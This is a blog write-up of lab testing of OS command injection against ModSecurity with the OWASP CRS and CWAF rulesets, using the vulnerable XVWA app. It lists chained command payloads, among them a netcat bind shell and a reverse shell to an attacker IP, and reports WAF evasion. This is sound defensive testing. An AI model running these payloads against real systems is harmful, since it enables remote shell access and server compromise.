In this blog, we will be Testing OS command injection attack on vulnerable application with OWASP CRS & CWAF Ruleset.
How to identify the flaw on OWASP CRS & CWAF Ruleset?
- At first, set up the vulnerable application i.e XVWA,OWASP Mutillidae Vulnerable App on the server for testing WAF rules.
- Install modsecurity and include both OWASP CRS && CWAF ruleset in apache config.
- Before start testing the Vulnerable app, have a clear understading about OWASP TOP 10 vulnerability
- How it works?
- How to exploit it?
- What are the modern evasion technique to bypass WAF rules?
- How it works?
- Read the Modsecurity Reference manual on Github
- Understand how modsecurity works ?
- start analyse the rules?
- Break the regex and analyse how it was developed?
- Start testing regex pattern to understand how prefect it detect payloads?
- Understand how modsecurity works ?
- Start testing the vulnerable app.
How to test OS command Injection attack on vulnerable application with OWASP CRS & CWAF Ruleset?
- Install Modsecurity and Configure OWASP CRS & CWAF rule set.
- Install xvwa app and Configure it with database.
- Start testing the XVWA app for OS commands injection.
Test Scenario
1.Testing OS Command injection attack on OWASP CRS
Info: We can use && or | or ; to pipe the command to execute.
Include the OWASP CRS on apache config and test the following payloads on the xvwa vulnerable application for OS command injection.
127.0.0.1 && cd /root/Desktop/ && pwd && service --status-all
127.0.0.1 && ps
127.0.0.1 && service mysql status
127.0.0.1 && service apache2 status
As a result, OWASP CRS failed to detect these above injection payloads, but it block almost ever major OS Commands injection payloads from execution on server. Check the demo video to know more.
2.Testing OS Command injection attack on CWAF Ruleset
Note: We can use && or | or ; to pipe the command to execute.
Include the CWAF ruleset on apache config and test the following payloads on the xvwa vulnerable application for OS command injection.
127.0.0.1 && cd /root/Desktop/ && pwd && ps && service --status-all
127.0.0.1 && cat index.php
127.0.0.1 && echo "tell me whoami? I am Human or AI :)"
127.0.0.1 && nc -ln -e /bin/sh -p 9999
127.0.0.1 && uname -a
127.0.0.1 && netstat -ltnp | grep '80'
Let try reverse shell scenario using following payload:
Payload:
127.0.0.1 && nc -c /bin/sh 192.168.1.12 9999
Attacker IP - 192.168.1.12
Attacker Listener port: 9999
As a resut, CWAF failed to detect the major OS command injection attack on the application, which lead us to get reverse shell on the server. Check the demo video to know more.